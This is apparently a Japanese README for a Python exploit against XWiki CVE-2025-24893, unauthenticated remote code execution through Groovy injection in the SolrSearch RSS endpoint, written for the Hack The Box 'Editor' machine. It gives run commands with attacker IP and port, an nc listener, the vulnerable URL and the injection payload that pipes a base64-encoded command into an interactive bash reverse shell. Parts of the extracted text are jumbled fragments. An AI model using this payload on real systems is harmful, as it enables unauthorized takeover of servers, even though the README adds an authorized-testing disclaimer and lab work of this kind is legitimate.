
XWiki CVE-2025-24893 に対するGroovyスクリプトインジェクション経由の未認証RCEエクスプロイト
CVE-2025-24893 の脆弱性がある XWiki バージョン向けの認証不要リモートコード実行エクスプロイト。
XWiki 15.10.9 より前のバージョンは、SolrSearch RSS フィードハンドラにおける Groovy スクリプトインジェクションを通じて、認証不要のリモートコード実行 (RCE) に対して脆弱です。この脆弱性は、XWiki が text パラメータ内のユーザー入力を適切にサニタイズできず、攻撃者が RSS コンテキストから抜け出して任意の Groovy コードを注入できるために存在します。
CVE ID: CVE-2025-24893
CVSS スコア: 9.8 (Critical)
影響を受けるバージョン: XWiki < 15.10.9
requests ライブラリのみ)pip3 install requests
python3 exploit.py <target_url> <attacker_ip> <listener_port>
例:
# 攻撃側マシンでリスナーを起動
nc -lvnp 9001
# エクスプロイトを実行
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001
}}}}}}{{{{groovy}}}}) を使用して Groovy コードでラップ/xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload> に送信エクスプロイトは以下のエンドポイントをターゲットにします:
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
脆弱性により、RSS フィードコンテキストから抜け出すことが可能です:
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}
このツールは教育目的および許可されたペネトレーションテストの目的にのみ使用されます。作者はこのプログラムの誤用や損害について一切の責任を負いません。このエクスプロイトは、自分が所有するシステム、または明示的なテスト許可があるシステムに対してのみ使用してください。
MIT ライセンス - 詳細は LICENSE ファイルを参照
HTB の「Editor」ボックス向けに作成
注意: システムをテストする前に、必ず適切な承認を得てください。